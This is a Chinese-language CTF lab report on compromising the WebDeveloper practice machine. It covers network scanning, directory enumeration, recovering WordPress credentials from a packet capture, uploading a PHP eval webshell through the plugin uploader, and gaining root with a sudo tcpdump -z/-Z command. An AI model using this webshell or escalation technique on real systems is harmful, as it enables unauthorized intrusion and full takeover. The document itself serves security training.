---

一、實驗目的

通過對目標靶機的滲透過程，瞭解CTF競賽模式，理解CTF涵蓋的知識範圍，如MISC、PPC、WEB等，通過實踐，加強團隊協作能力，掌握初步CTF實戰能力及資訊收集能力。熟悉網路掃描、探測HTTP web服務、目錄列舉、提權、影像資訊提取、密碼破解等相關工具的使用。

二、實驗準備

• 靶機：WebDeveloper
• 工具：kali
• 連線方式：NAT
• 目標：抓獲靶機檔案 /root/flag.txt 拿到flag

---

三、實驗過程

1.用namp掃描整個網段，發現靶機IP和埠開放情況

掃描完畢後，129是我的ip地址，篩選之後便是134為靶機的IP

nmap -sP 192.168.119.0/24

埠開放為兩個埠

nmap -sS 192.168.119.134

2. 訪問目標網站

3. 資訊收集：

3.1 Dirb:網站目錄列舉

dirb http://192.168.119.134/ -o result.txt

發現一個Data檔案，訪問連結得到檔案

3.2 data資料包分析

將其放在winhex檢視檔案型別，發現了http的檔案頭，因此應該是一個http抓的包，將其放進wireshark分析

在這裡我們找到了登入的賬號的密碼

再次訪問並登入網站

3.3 漏洞探測

經過查詢，探查到在上傳外掛這個可以上傳我們的horse，編寫horse並儲存為php格式

<?php @eval($_POST['shell']);phpinfo(); ?>

上傳之後彈出下載錯誤的資訊，但訪問horse是可以的，路徑/wp-content/uploads/year/month/xx.php

出現phpinfo就成功了

4. 漏洞利用

採用中國蟻劍連線webshell，嘗試是否可以直接訪問/root/flag.txt檔案，結果許可權不夠

但在目錄中我們找到了config.php檔案,一般儲存重要資訊，果然發現了MySQL資料庫的使用者名稱和密碼：

5.提權檢視flag.txt

用xshell連線22埠，sudo -l檢視可以用的 root 命令有一個tcpdump，可以利用tcpdump進行提權

之後我們構造攻擊指令碼，exploit，寫入shellcode，shellcode為要執行的程式碼，賦予可執行的許可權，最後利用tcpdump執行任意命令

touch /tmp/exploit
echo 'cat /root/flag.txt' > /tmp/exploit
chmod +x /tmp/exploit // +x 參數列示給 exploit 檔案賦予可執行許可權
sudo tcpdump -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root

用到的tcpdump命令：
-i eth0 從指定網路卡捕獲資料包
-w /dev/null 將捕獲到的資料包輸出到空裝置（不輸出資料包結果）
-z [command] 執行指定的命令
-Z [user] 指定使用者執行命令
-G [rotate_seconds] 每rotate_seconds秒一次的頻率執行-w指定的轉儲
-W [num] 指定抓包數量

    tcpdump提權的原理就是利用-z和-Z，-z執行指令碼，-Z指定以 root 使用者執行指令碼，從而提權

    ``-W1-G1，表示一次抓一個包，然後把這個包丟到黑洞裡面，黑洞是dev/null`

        tcpdump是什麼

        用簡單的話來定義，就是：dump the traffic on a network，根據使用者的定義對網路上的資料包進行截獲的包分析工具。

可以將網路中傳送的資料包的“頭”完全截獲下來提供分析。它支援針對網路層、協議、主機、網路或埠的過濾，並提供and、or、not等邏輯語句來幫助你去掉無用的資訊。

執行完畢拿到flag

---

總結

實戰比前幾次實驗更考驗人的能力，當然如果沒有前幾次實驗的基礎也不能完成這次試驗。在實戰中是檢驗自己的時刻，也是學習新知識提升自身的時刻，多做實戰，將知識熟練運用，真正沉澱為自身的實力。

參考部落格：https://c1everf0x.github.io/2020/12/02/%E7%BD%91%E7%BB%9C%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%AE%9E%E9%AA%8C%E5%9B%9B/